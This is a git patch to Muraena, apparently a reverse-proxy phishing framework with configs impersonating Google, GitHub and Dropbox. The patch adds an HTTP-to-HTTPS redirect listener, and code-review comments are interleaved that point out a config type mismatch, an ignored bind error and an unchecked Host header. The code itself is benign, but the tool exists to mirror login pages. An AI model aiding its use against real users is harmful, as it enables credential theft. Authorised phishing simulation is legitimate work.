From c3fbb85512a602e16b4de9fa6d71dd9f18e19725 Mon Sep 17 00:00:00 2001 From: Ohpe <704560+ohpe@users.noreply.github.com> Date: Mon, 27 Jul 2020 17:29:26 +0200 Subject: [PATCH] new: add support for redirecting HTTP to HTTPS #29 --- config/config.json | 6 +++++- config/dropbox.json | 1 + config/github.com.json | 1 + config/google.com.json | 1 + main.go | 10 ++++++---- proxy/handler.go | 18 ++++++++++++++++++ session/config.go | 4 ++++ 7 files changed, 36 insertions(+), 5 deletions(-) diff --git a/config/config.json b/config/config.json index ff9521c..08740b0 100755 --- a/config/config.json +++ b/config/config.json @@ -5,7 +5,11 @@ "listener": { "ip": "0.0.0.0", - "port": 443, + "port": 8443, + "HTTPtoHTTPS": { + "enabled": true, + "HTTPport": 8080 + } }, "skipContentType": [ diff --git a/config/dropbox.json b/config/dropbox.json index 409a3dd..98251d2 100755 --- a/config/dropbox.json +++ b/config/dropbox.json @@ -6,6 +6,7 @@ "listener": { "ip": "0.0.0.0", "port": 443, + "HTTPtoHTTPS": true }, "skipContentType": [ diff --git a/config/github.com.json b/config/github.com.json index 0cf6b66..977a026 100755 --- a/config/github.com.json +++ b/config/github.com.json @@ -6,6 +6,7 @@ "listener": { "ip": "0.0.0.0", "port": 443, + "HTTPtoHTTPS": true }, "skipContentType": [ diff --git a/config/google.com.json b/config/google.com.json index fdc0377..2256ea1 100755 --- a/config/google.com.json +++ b/config/google.com.json @@ -6,6 +6,7 @@ "listener": { "ip": "0.0.0.0", "port": 443, + "HTTPtoHTTPS": true }, "skipContentType": [ diff --git a/main.go b/main.go index 172f1b5..0ac737b 100644 --- a/main.go +++ b/main.go @@ -101,9 +101,6 @@ func main() { s.HandleFood(w, r) }) - - - listeningAddress := fmt.Sprintf("%s:%d", sess.Config.Proxy.Listener.IP, sess.Config.Proxy.Listener.Port) lline := fmt.Sprintf("Muraena is alive on %s\n[ %s ] ==> [ %s ]", tui.Green(listeningAddress), tui.Yellow(sess.Config.Proxy.Phishing), tui.Green(sess.Config.Proxy.Target)) 
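Review bot: In config/dropbox.json the added `"HTTPtoHTTPS": true` is a boolean, but session/config.go in this same commit declares `HTTPtoHTTPS` as a struct with `enabled` and `HTTPport` fields, and config/config.json uses the object form. If the loader decodes with encoding/json (the loader is not visible here), a bare boolean in that position produces a type error instead of enabling the option. The same line is added in config/github.com.json and config/google.com.json. All three should use the shape config.json already has, `"HTTPtoHTTPS": { "enabled": true, "HTTPport": 8080 }`.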
@@ -116,6 +113,12 @@ func main() { CertPool: sess.Config.TLS.Root, } + if sess.Config.Proxy.Listener.HTTPtoHTTPS.Enabled { + // redirect HTTP > HTTPS + listingHTTP := fmt.Sprintf("%s:%d", sess.Config.Proxy.Listener.IP, sess.Config.Proxy.Listener.HTTPtoHTTPS.HTTPport) + go http.ListenAndServe(listingHTTP, proxy.RedirectToHTTPS(sess.Config.Proxy.Listener.Port)) + } + if err := tlsServer.ServeTLS(listeningAddress); err != nil { log.Fatal("Error binding Muraena on HTTPS: %s", err) } @@ -126,5 +129,4 @@ func main() { } } - } diff --git a/proxy/handler.go b/proxy/handler.go index a07e2aa..d592f96 100644 --- a/proxy/handler.go +++ b/proxy/handler.go @@ -7,6 +7,7 @@ import ( "io/ioutil" "net/http" "net/url" + "regexp" "strconv" "strings" @@ -45,6 +46,23 @@ type SessionType struct { Replacer *Replacer } +func RedirectToHTTPS(port int) http.HandlerFunc { + + return func(w http.ResponseWriter, req *http.Request) { + + var re = regexp.MustCompile(`(:\d+)$`) + host := re.ReplaceAllString(req.Host, "") + + newURL := fmt.Sprintf("https://%s%s", host, req.URL.String()) + if port != 443 { + newURL = fmt.Sprintf("https://%s:%d%s", host, port, req.URL.String()) + } + + log.Info("Redirecting HTTP to HTTPS: %s", newURL) + http.Redirect(w, req, newURL, http.StatusMovedPermanently) + } +} + func (muraena *MuraenaProxy) RequestBodyProcessor(request *http.Request, track *tracking.Trace, base64 Base64) (err error) { if request.Body != nil { diff --git a/session/config.go b/session/config.go index 48ee1a4..85fe4e7 100644 --- a/session/config.go +++ b/session/config.go @@ -28,6 +28,10 @@ type Configuration struct { Listener struct { IP string `json:"IP"` Port int `json:"port"` + HTTPtoHTTPS struct { + Enabled bool `json:"enabled"` + HTTPport int `json:"HTTPport"` + } `json:"HTTPtoHTTPS"` } `json:"listener"` SkipContentType []string `json:"skipContentType"`
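Review bot: In main.go, `go http.ListenAndServe(listingHTTP, ...)` discards the returned error, so a failed bind on the HTTP port (already in use, or not permitted) leaves the process running with no redirect listener and nothing in the log. The goroutine should check the error the way the HTTPS bind below it does, for example `go func() { if err := http.ListenAndServe(listingHTTP, h); err != nil { log.Fatal("Error binding HTTP redirect listener: %s", err) } }()`, where `h` is the `proxy.RedirectToHTTPS(...)` handler. `http.ListenAndServe` also runs a server with no read or write timeouts, so an explicit `http.Server` with timeouts set would be safer for a listener bound on `0.0.0.0`. The body of `main` continues outside this hunk.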
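Review bot: In proxy/handler.go, `regexp.MustCompile` is called inside the returned closure, so the pattern is recompiled on every request. It should be compiled once at package scope, e.g. `var portSuffix = regexp.MustCompile(":\\d+$")`, and the closure should call `portSuffix.ReplaceAllString(req.Host, "")`. `req.Host` is supplied by the client and is copied unchecked into both the `Location` header and the log line, so the handler will redirect to whatever host the request names; comparing it against the configured hostname first would close that. The exported function also lacks a doc comment, for example `// RedirectToHTTPS returns a handler that 301-redirects each request to the same host and URL over HTTPS on port.`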